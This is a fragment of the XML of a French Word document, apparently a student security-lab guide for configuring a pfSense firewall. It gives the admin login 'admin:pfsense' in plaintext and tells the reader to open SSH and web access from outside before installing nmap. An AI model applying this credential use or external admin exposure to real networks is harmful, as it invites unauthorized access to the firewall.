        <w:t xml:space="preserve"> du pare-feu via https://192.168.200.1 avec les identifiants </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>admin:pfsense</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t xml:space="preserve">.  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3FA54016" w14:textId="77777777" w:rsidR="001068B6" w:rsidRDefault="00000000">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:after="193"/>
        <w:ind w:hanging="326"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Activez le service SSH dans les paramètres avancés du </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>Pfsense</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve">, accessible via l'onglet </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>"System"</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> puis </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>"Advanced"</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">. Ajoutez ensuite une règle dans le pare-feu pour autoriser le trafic SSH et Web depuis l'extérieur. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="41987125" w14:textId="58D4F350" w:rsidR="001068B6" w:rsidRDefault="00000000">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:after="192"/>
        <w:ind w:hanging="326"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Pour l'installation de </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>nmap</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve">, configurez un serveur DNS dans les paramètres généraux du système, sous </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>"System"</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> puis </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">"General Setup" </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2358615F" w14:textId="3F215794" w:rsidR="001068B6" w:rsidRDefault="00000000" w:rsidP="00D1640B">
      <w:pPr>
        <w:ind w:left="0" w:firstLine="0"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:sectPr w:rsidR="001068B6">
      <w:footerReference w:type="even" r:id="rId23"/>
      <w:footerReference w:type="default" r:id="rId24"/>
      <w:footerReference w:type="first" r:id="rId25"/>
      <w:pgSz w:w="11904" w:h="16838"/>
      <w:pgMar w:top="715" w:right="732" w:bottom="1372" w:left="720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BECE4" w14:textId="77777777" w:rsidR="00060D57" w:rsidRDefault="00060D57">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:separator/>
      </w:r>
    </w:p>
  </w:endnote>
  <w:endnote w:type="continuationSeparator" w:id="0">
    <w:p w14:paraId="075FC905" w14:textId="77777777" w:rsidR="00060D57" w:rsidRDefault="0006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C6946" w14:textId="77777777" w:rsidR="001068B6" w:rsidRDefault="00000000">
    <w:pPr>
      <w:spacing w:after="0" w:line="259" w:lineRule="auto"/>
      <w:ind w:left="0" w:right="-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D2F8209" w14:textId="77777777" w:rsidR="001068B6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4E9B4" w14:textId="77777777" w:rsidR="001068B6" w:rsidRDefault="00000000">
    <w:pPr>
      <w:spacing w:after="0" w:line="259" w:lineRule="auto"/>
      <w:ind w:left="0" w:right="-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806906F" w14:textId="77777777" w:rsidR="001068B6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91CE3" w14:textId="77777777" w:rsidR="001068B6" w:rsidRDefault="00000000">
    <w:pPr>
      <w:spacing w:after="0" w:line="259" w:lineRule="auto"/>
      <w:ind w:left="0" w:right="-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25DE40" w14:textId="77777777" w:rsidR="001068B6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B3700" w14:textId="77777777" w:rsidR="00060D57" w:rsidRDefault="00060D57">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:separator/>
      </w:r>
    </w:p>
  </w:footnote>
  <w:footnote w:type="continuationSeparator" w:id="0">
    <w:p w14:paraId="1311C444" w14:textId="77777777" w:rsidR="00060D57" w:rsidRDefault="00060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E2757"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="D450AC5C"/>
    <w:lvl w:ilvl="0" w:tplc="B12A07EE">
      <w:start w:val="1"/>
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val="%1."/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="3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6CD9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EE87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E2E7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8ADA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AAFC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0B4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7E74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886E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95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8B6"/>
    <w:rsid w:val="00060D57"/>
    <w:rsid w:val="001068B6"/>
    <w:rsid w:val="00D1640B"/>
    <w:rsid w:val="00DF4D17"/>
    <w:rsid w:val="00F3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B7B8"/>
  <w15:docId w15:val="{9FCBEE6F-C1D4-421A-83F5-2EFB1644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2" w:line="259" w:lineRule="auto"/>
      <w:ind w:left="16"/>
      <w:jc w:val="center"/>
      <w:outlineLvl w:val="0"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
      <w:b/>
      <w:color w:val="000000"/>
      <w:sz w:val="4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44"/>
      <w:u w:val="single" w:color="000000"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:styleId="Lienhypertexte">
    <w:name w:val="Hyperlink"/>
    <w:basedOn w:val="Policepardfaut"/>
    <w:uiPriority w:val="99"/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="00DF4D1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4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secur.sae:80/developers/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BRIDAY</dc:creator>
  <cp:keywords/>
  <cp:lastModifiedBy>MAEL BRIDAY</cp:lastModifiedBy>
  <cp:revision>3</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2024-03-23T13:21:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2024-03-23T13:39:00Z</dcterms:modified>
</cp:coreProperties>
</file>